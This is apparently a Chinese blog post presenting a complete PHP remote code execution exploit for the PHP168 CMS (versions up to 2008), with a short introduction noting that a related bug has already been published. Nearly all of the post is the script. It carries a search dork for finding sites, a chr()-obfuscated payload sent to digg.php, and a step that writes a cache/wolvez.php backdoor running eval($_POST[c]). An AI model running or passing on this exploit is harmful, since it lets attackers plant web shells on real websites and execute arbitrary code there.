|
据可靠线报,有人已发现此相似漏洞[漏洞虽不一样,但在同一个文件,利用了相同的变量]并发在黑防上了,估计官方很快就会发布补丁了吧,那么我这个exp恐怕也会废掉了:)
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
Php168 <= v2008 remote code execution exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to php168
Example:
php '.$argv[0].' localhost /php168/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$cmd = 'makehtml=1&chdb[htmlname]=${${fputs(fopen(chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(119).chr(111).chr(108).chr(118).chr(101).chr(122).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(112).chr(117).chr(114).chr(101).chr(116).chr(95).chr(116))}}';
$shell = 'http://'.$host.$path.'cache/wolvez.php';
/**
* wolvez.php has this code:
* <?eval($_POST[c])?>
*/
send($cmd);
if (!file_get_contents($url) && file_get_contents($shell) == 'puret_t')
exit("Expoilt Success!\nView Your shell:\t$shell\n");
else
exit("Exploit Failed!\n");
function send($cmd)
{
global $host, $path;
$message = "POST ".$path."digg.php HTTP/1.1\r\n";
// $message = "POST ".$path."login.php HTTP/1.1\r\n";
// $message = "POST ".$path."search.php HTTP/1.1\r\n";
// $message = "POST ".$path."sendpwd.php HTTP/1.1\r\n";
// $message = "POST ".$path."showsp.php HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Referer: http://$host$path\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>
|
推荐
评论(0条)
